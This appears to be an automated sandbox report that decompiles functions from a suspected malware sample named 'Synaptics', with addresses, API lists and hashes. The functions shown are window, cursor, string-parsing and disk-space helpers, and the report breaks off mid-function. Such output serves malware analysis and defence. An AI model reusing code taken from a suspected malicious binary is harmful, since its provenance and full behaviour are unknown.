                                                                                                                                                                                                                            • String ID: Can not start monitoring
                                                                                                                                                                                                                            • API String ID: 2233126570-3835272546
                                                                                                                                                                                                                            • Opcode ID: e9bc4d888281bdc3d552610812b648f0ad08ccdec08c8ed41ad8283631ef98ab
                                                                                                                                                                                                                            • Instruction ID: 443d9707a36d2025ed6040a5d28f1c7387ed03c1380d4d8ed495eb8cf4c6426e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9bc4d888281bdc3d552610812b648f0ad08ccdec08c8ed41ad8283631ef98ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02F0F4B06442016FDB54DFADCC85F1537A46F05715F1102A5FB14DF2D6E675DC048714
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00442ECC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00442ECC(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t19;
				struct HWND__* _t20;
				intOrPtr* _t23;

				_t20 = __eax;
				_t1 =  &_a4; // 0x443144
				_t23 =  *_t1;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 =  &_v12; // 0x443144
				ClientToScreen(__eax, _t4);
				GetWindowRect(_t20,  &_v28);
				_t6 =  &_v12; // 0x443144
				 *_t23 =  *_t6 - _v28.left;
				_t19 = _v8 - _v28.top;
				 *((intOrPtr*)(_t23 + 4)) = _t19;
				return _t19;
			}









                                                                                                                                                                                                                            0x00442ed4
                                                                                                                                                                                                                            0x00442ed6
                                                                                                                                                                                                                            0x00442ed6
                                                                                                                                                                                                                            0x00442ed9
                                                                                                                                                                                                                            0x00442edc
                                                                                                                                                                                                                            0x00442edf
                                                                                                                                                                                                                            0x00442ee4
                                                                                                                                                                                                                            0x00442eee
                                                                                                                                                                                                                            0x00442ef3
                                                                                                                                                                                                                            0x00442ef9
                                                                                                                                                                                                                            0x00442efe
                                                                                                                                                                                                                            0x00442f01
                                                                                                                                                                                                                            0x00442f09

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClientRectScreenWindow
                                                                                                                                                                                                                            • String ID: D1D$D1D
                                                                                                                                                                                                                            • API String ID: 3371951266-2689743835
                                                                                                                                                                                                                            • Opcode ID: 3274c0dfdbe0219fc24fefe6f8f375bc8f66ff92587090afc903952a86c72523
                                                                                                                                                                                                                            • Instruction ID: 696a0ad0a36b5a628bc16ef9a9fef7e4a028d98c1b31806480246e0535002fd9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3274c0dfdbe0219fc24fefe6f8f375bc8f66ff92587090afc903952a86c72523
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF0A2B5D0420DAFCB00DFE9C9818DEFBFCEB08250F10456AA945F3741E630AA408BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040E884 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E884() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x49b158 = _t1;
				}
				if( *0x49b158 == 0) {
					 *0x49b158 = E00409ED4;
					return E00409ED4;
				}
				return _t1;
			}





                                                                                                                                                                                                                            0x0040e88a
                                                                                                                                                                                                                            0x0040e88f
                                                                                                                                                                                                                            0x0040e893
                                                                                                                                                                                                                            0x0040e89b
                                                                                                                                                                                                                            0x0040e8a0
                                                                                                                                                                                                                            0x0040e8a0
                                                                                                                                                                                                                            0x0040e8ac
                                                                                                                                                                                                                            0x0040e8b3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e8b3
                                                                                                                                                                                                                            0x0040e8b9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F2ED,00000000,0040F300), ref: 0040E88A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040E89B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                            • Opcode ID: 48bbcabc8f02b2d24e1da495698a7276f8bc32b2cd4885076d013a1cd8d10edc
                                                                                                                                                                                                                            • Instruction ID: 06fc51cb68962c5c382d4d7a2f86af93b26a51ec458fff072f92dd4ff1898c2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48bbcabc8f02b2d24e1da495698a7276f8bc32b2cd4885076d013a1cd8d10edc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFD09E62A043C55AF700BBA6A9EA7162658D720344B24C83BA000773D2D7FD4C94979D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0041CE2C Relevance: 6.4, APIs: 5, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				E0041BEF0(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00404E80(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					if(_t72 != E0041CFA4(_v8)) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							if(_t73 <= 0x20 || _t73 == E0041CF8C(_v8)) {
								break;
							}
							 *_t94 = CharNextA( *_t94);
						}
						E00404AB0( &_v16,  *_t94 - _t91, _t91);
						L11:
						 *((intOrPtr*)( *_v8 + 0x38))();
						while( *( *_t94) - 0xffffffffffffffe1 < 0) {
							 *_t94 = CharNextA( *_t94);
						}
						if(E0041CF8C(_v8) !=  *( *_t94)) {
							continue;
						}
						if( *(CharNextA( *_t94)) == 0) {
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
						continue;
					}
					E004091D4(_t94,  &_v16, E0041CFA4(_v8));
					goto L11;
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E0041CF65);
				return E0041BFAC(_v8);
			}
















                                                                                                                                                                                                                            0x0041ce2d
                                                                                                                                                                                                                            0x0041ce2f
                                                                                                                                                                                                                            0x0041ce37
                                                                                                                                                                                                                            0x0041ce3a
                                                                                                                                                                                                                            0x0041ce3c
                                                                                                                                                                                                                            0x0041ce3f
                                                                                                                                                                                                                            0x0041ce4d
                                                                                                                                                                                                                            0x0041ce53
                                                                                                                                                                                                                            0x0041ce63
                                                                                                                                                                                                                            0x0041ce6b
                                                                                                                                                                                                                            0x0041ce75
                                                                                                                                                                                                                            0x0041ce83
                                                                                                                                                                                                                            0x0041ce81
                                                                                                                                                                                                                            0x0041ce81
                                                                                                                                                                                                                            0x0041cf3c
                                                                                                                                                                                                                            0x0041cf3e
                                                                                                                                                                                                                            0x0041cf42
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041ce9b
                                                                                                                                                                                                                            0x0041ceb3
                                                                                                                                                                                                                            0x0041cec1
                                                                                                                                                                                                                            0x0041cec3
                                                                                                                                                                                                                            0x0041cec8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041cebf
                                                                                                                                                                                                                            0x0041cebf
                                                                                                                                                                                                                            0x0041cedf
                                                                                                                                                                                                                            0x0041cee4
                                                                                                                                                                                                                            0x0041ceec
                                                                                                                                                                                                                            0x0041cefb
                                                                                                                                                                                                                            0x0041cef9
                                                                                                                                                                                                                            0x0041cef9
                                                                                                                                                                                                                            0x0041cf10
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041cf1d
                                                                                                                                                                                                                            0x0041cf26
                                                                                                                                                                                                                            0x0041cf26
                                                                                                                                                                                                                            0x0041cf29
                                                                                                                                                                                                                            0x0041cf31
                                                                                                                                                                                                                            0x0041cf38
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041cf29
                                                                                                                                                                                                                            0x0041ceac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041ceac
                                                                                                                                                                                                                            0x0041cf4a
                                                                                                                                                                                                                            0x0041cf4d
                                                                                                                                                                                                                            0x0041cf50
                                                                                                                                                                                                                            0x0041cf5d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CE7C
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CEF4
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CF15
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,?,00000000,0041CF7B,?,?,00000000,00000000), ref: 0041CF2C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213498283-0
                                                                                                                                                                                                                            • Opcode ID: 1fdf7e38554d3ddef2dffed84f85b628e6addbc14ec20851bbf473ee18a56b48
                                                                                                                                                                                                                            • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fdf7e38554d3ddef2dffed84f85b628e6addbc14ec20851bbf473ee18a56b48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00438E8C Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E00438E8C(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x49eb54 != 0) {
					L3:
					_t49 =  *0x49eb34; // 0x0
					_t50 =  *0x49eb34; // 0x0
					_t117 = E00438D6C(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x49eb54 == 0) {
						_t168 =  *0x49eb58;
						if( *0x49eb58 != 0) {
							_t106 =  *0x49eb48; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x49eb58; // 0x0
							E00443038(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x49eb34; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x49eb54;
						_t6 =  &_v24;
						 *_t6 =  *0x49eb54 != 0;
						__eflags =  *_t6;
						 *0x49eb54 = 2;
					} else {
						 *0x49eb54 = 1;
						_v24 = 0;
					}
					_t54 =  *0x49eb38; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x49eb38; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x49eb38; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x49eb38; // 0x0
							E0043AAC0( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x49eb38; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E00438DBC(2);
						_t121 =  *_t155;
						_t60 =  *0x49eb38; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x49eb58 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x49eb58; // 0x0
								E00443020(_t82, _t158);
								_t84 =  *0x49eb58; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x49eb58; // 0x0
									E00443120(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x49eb58; // 0x0
									E00443038(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x49eb58; // 0x0
								E00443194(_t91, _t131, __eflags);
								_t93 =  *0x49de0c; // 0x49ebbc
								SetCursor(E004586EC( *_t93, _t158));
							}
						}
						_t62 =  *0x49de0c; // 0x49ebbc
						_t65 = SetCursor(E004586EC( *_t62, _t158));
						if( *0x49eb54 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E00438DF8(_t121);
								_t67 =  *0x49eb38; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0043AAC0(_t118,  &_v24, _t155);
									_t65 = E00403DE8(_t118, __eflags);
									_t135 =  *0x49eb38; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x49eb38; // 0x0
									_t65 = E00403DE8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x49eb38; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x49eb38; // 0x0
								_t65 = E00403DE8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x49eb38 == 0) {
								goto L32;
							} else {
								_t119 =  *0x49eb38; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00408E50(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x49eb38; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x49eb38; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x49eb38; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E00438DBC(1);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					_t102 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x49eb38; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E00438DBC(0);
					if( *0x49eb38 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x49eb44; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x49eb50; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x49eb48; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x49eb50; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                                                                                                                                                                                                            0x00438e92
                                                                                                                                                                                                                            0x00438e9b
                                                                                                                                                                                                                            0x00438eca
                                                                                                                                                                                                                            0x00438eca
                                                                                                                                                                                                                            0x00438ed0
                                                                                                                                                                                                                            0x00438ee6
                                                                                                                                                                                                                            0x00438eef
                                                                                                                                                                                                                            0x00438ef1
                                                                                                                                                                                                                            0x00438ef8
                                                                                                                                                                                                                            0x00438efa
                                                                                                                                                                                                                            0x00438f00
                                                                                                                                                                                                                            0x00438f0d
                                                                                                                                                                                                                            0x00438f12
                                                                                                                                                                                                                            0x00438f12
                                                                                                                                                                                                                            0x00438ef8
                                                                                                                                                                                                                            0x00438f17
                                                                                                                                                                                                                            0x00438f23
                                                                                                                                                                                                                            0x00438f33
                                                                                                                                                                                                                            0x00438f3a
                                                                                                                                                                                                                            0x00438f3a
                                                                                                                                                                                                                            0x00438f3a
                                                                                                                                                                                                                            0x00438f3f
                                                                                                                                                                                                                            0x00438f25
                                                                                                                                                                                                                            0x00438f25
                                                                                                                                                                                                                            0x00438f2c
                                                                                                                                                                                                                            0x00438f2c
                                                                                                                                                                                                                            0x00438f46
                                                                                                                                                                                                                            0x00438f4e
                                                                                                                                                                                                                            0x00438f9b
                                                                                                                                                                                                                            0x00438f9b
                                                                                                                                                                                                                            0x00438fa2
                                                                                                                                                                                                                            0x00438fa8
                                                                                                                                                                                                                            0x00438fab
                                                                                                                                                                                                                            0x00438fb4
                                                                                                                                                                                                                            0x00438fbc
                                                                                                                                                                                                                            0x00438fc4
                                                                                                                                                                                                                            0x00438fc9
                                                                                                                                                                                                                            0x00438fd2
                                                                                                                                                                                                                            0x00438fd9
                                                                                                                                                                                                                            0x00438fd9
                                                                                                                                                                                                                            0x00438fe7
                                                                                                                                                                                                                            0x00438fe9
                                                                                                                                                                                                                            0x00438feb
                                                                                                                                                                                                                            0x00438ff5
                                                                                                                                                                                                                            0x00438ffe
                                                                                                                                                                                                                            0x00439002
                                                                                                                                                                                                                            0x0043900c
                                                                                                                                                                                                                            0x00439011
                                                                                                                                                                                                                            0x00439016
                                                                                                                                                                                                                            0x0043901b
                                                                                                                                                                                                                            0x0043901f
                                                                                                                                                                                                                            0x0043903a
                                                                                                                                                                                                                            0x0043903f
                                                                                                                                                                                                                            0x00439044
                                                                                                                                                                                                                            0x00439021
                                                                                                                                                                                                                            0x00439025
                                                                                                                                                                                                                            0x0043902c
                                                                                                                                                                                                                            0x0043902e
                                                                                                                                                                                                                            0x00439033
                                                                                                                                                                                                                            0x00439033
                                                                                                                                                                                                                            0x0043904b
                                                                                                                                                                                                                            0x0043904b
                                                                                                                                                                                                                            0x00439050
                                                                                                                                                                                                                            0x00439058
                                                                                                                                                                                                                            0x00439065
                                                                                                                                                                                                                            0x00439065
                                                                                                                                                                                                                            0x00439002
                                                                                                                                                                                                                            0x0043906d
                                                                                                                                                                                                                            0x0043907a
                                                                                                                                                                                                                            0x00439086
                                                                                                                                                                                                                            0x00439159
                                                                                                                                                                                                                            0x00439159
                                                                                                                                                                                                                            0x0043908c
                                                                                                                                                                                                                            0x0043908c
                                                                                                                                                                                                                            0x0043908e
                                                                                                                                                                                                                            0x004390af
                                                                                                                                                                                                                            0x004390b1
                                                                                                                                                                                                                            0x004390b6
                                                                                                                                                                                                                            0x004390b9
                                                                                                                                                                                                                            0x004390bb
                                                                                                                                                                                                                            0x004390e9
                                                                                                                                                                                                                            0x004390f8
                                                                                                                                                                                                                            0x004390fd
                                                                                                                                                                                                                            0x00439103
                                                                                                                                                                                                                            0x004390bd
                                                                                                                                                                                                                            0x004390c5
                                                                                                                                                                                                                            0x004390d1
                                                                                                                                                                                                                            0x004390d6
                                                                                                                                                                                                                            0x004390dc
                                                                                                                                                                                                                            0x004390dc
                                                                                                                                                                                                                            0x00439090
                                                                                                                                                                                                                            0x00439093
                                                                                                                                                                                                                            0x00439096
                                                                                                                                                                                                                            0x004390a3
                                                                                                                                                                                                                            0x004390a3
                                                                                                                                                                                                                            0x0043910d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043910f
                                                                                                                                                                                                                            0x0043910f
                                                                                                                                                                                                                            0x00439115
                                                                                                                                                                                                                            0x00439118
                                                                                                                                                                                                                            0x00439120
                                                                                                                                                                                                                            0x00439127
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043912e
                                                                                                                                                                                                                            0x00439130
                                                                                                                                                                                                                            0x00439137
                                                                                                                                                                                                                            0x00439137
                                                                                                                                                                                                                            0x0043913a
                                                                                                                                                                                                                            0x00439141
                                                                                                                                                                                                                            0x00439144
                                                                                                                                                                                                                            0x0043914f
                                                                                                                                                                                                                            0x00439150
                                                                                                                                                                                                                            0x00439151
                                                                                                                                                                                                                            0x00439152
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00439152
                                                                                                                                                                                                                            0x0043910d
                                                                                                                                                                                                                            0x00439086
                                                                                                                                                                                                                            0x00438f52
                                                                                                                                                                                                                            0x00438f5e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438f64
                                                                                                                                                                                                                            0x00438f69
                                                                                                                                                                                                                            0x00438f6c
                                                                                                                                                                                                                            0x00438f74
                                                                                                                                                                                                                            0x00438f77
                                                                                                                                                                                                                            0x00438f7e
                                                                                                                                                                                                                            0x00438f84
                                                                                                                                                                                                                            0x00438f89
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438f95
                                                                                                                                                                                                                            0x00438e9d
                                                                                                                                                                                                                            0x00438ea4
                                                                                                                                                                                                                            0x00438ea9
                                                                                                                                                                                                                            0x00438eaf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438eb1
                                                                                                                                                                                                                            0x00438eb9
                                                                                                                                                                                                                            0x00438ebc
                                                                                                                                                                                                                            0x00438ebe
                                                                                                                                                                                                                            0x00438ec4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00438F00
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00439025
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043907A
                                                                                                                                                                                                                              • Part of subcall function 00443194: 73751770.COMCTL32(00000000,?,00439055), ref: 004431B0
                                                                                                                                                                                                                              • Part of subcall function 00443194: ShowCursor.USER32(000000FF,00000000,?,00439055), ref: 004431CB
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00439065
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor$DesktopWindow$73751770Show
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 978888386-0
                                                                                                                                                                                                                            • Opcode ID: 93ca7b10fa435c23d891b28464925a9332c02dd8bf1b3bb2ac27d7e48d7edd04
                                                                                                                                                                                                                            • Instruction ID: 7774f5f5771a5045a1e06358bb4aae0e40f1de296239ba1c3ef58bb47b11143b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93ca7b10fa435c23d891b28464925a9332c02dd8bf1b3bb2ac27d7e48d7edd04
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C919174606241DFE704DF2AD885A06B7F1BB69314F14907BE4069B3A2CB78FC85CB4A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004107F0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E004107F0(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
